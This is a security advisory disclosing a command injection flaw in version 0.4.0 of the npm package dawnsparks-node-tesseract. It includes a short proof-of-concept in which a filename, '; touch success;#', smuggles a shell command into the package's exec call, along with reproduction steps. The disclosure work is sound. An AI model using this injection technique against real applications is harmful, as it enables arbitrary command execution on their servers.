Vulnerability in dawnsparks-node-tesseract
This report details an arbitrary command injection (ACI) vulnerability affecting dawnsparks-node-tesseract@0.4.0.
Package source
- https://www.npmjs.com/package/dawnsparks-node-tesseract
- https://github.com/rona-dinihari/dawnsparks-node-tesseract
Package description
"A simple wrapper for the Tesseract OCR package for node.js"
Vulnerability Overview
Affected versions of this package are vulnerable to arbitrary command injection (CWE-77 [1]).
If an image file whose name is attacker-controlled is passed to the package's process function, an attacker can execute arbitrary commands on the operating system that runs the package.
The vulnerability is due to the use of the child_process exec function on an unsanitized filename: exec hands the command string to a shell, so shell metacharacters in the filename are interpreted. The Node.js API documentation states that unsanitized user input must never be passed to exec, because any input containing shell metacharacters may be used to trigger arbitrary command execution [2].
[1] https://cwe.mitre.org/data/definitions/77.html
[2] https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback
Reproduction
To exploit this vulnerability, a user must submit an image file to a Node.js application that uses "dawnsparks-node-tesseract" as a dependency to perform optical character recognition. If the submitted image filename contains shell metacharacters followed by commands, the shell evaluates them, allowing the user to execute arbitrary commands on the application's server.
The proof-of-concept (PoC) program below illustrates the issue for version 0.4.0. Executing this code causes the command "touch success" to be run, creating a file called success in the current working directory.
// PoC for dawnsparks-node-tesseract@0.4.0: the filename is interpolated into a shell command
var PUT = require('dawnsparks-node-tesseract');
// Attacker-controlled "filename": ';' ends the tesseract command, 'touch success' runs, '#' comments out the rest
var user_image_filename = "; touch success;#";
try {
    // process() builds and runs the command; by the time the callback could fire, the side effect has already happened
    new PUT.process(user_image_filename, {}, function () {});
} catch (e) {
    // Any error from the (failed) OCR step is irrelevant to the injected command
    console.log(e);
}
Environment: Node.js v15.5.1 on Linux
Steps to reproduce:
- Install the vulnerable version: npm i dawnsparks-node-tesseract@0.4.0
- Create a file, e.g., poc0.js, containing the PoC code.
- Execute the file: node poc0.js
A file called success is created in the current directory as a result of executing the PoC (verify with ls -l success).
Remarks
This vulnerability was originally discovered in version 0.3.3 of this package, which was previously named "huedawn-tesseract" (unpublished from npm).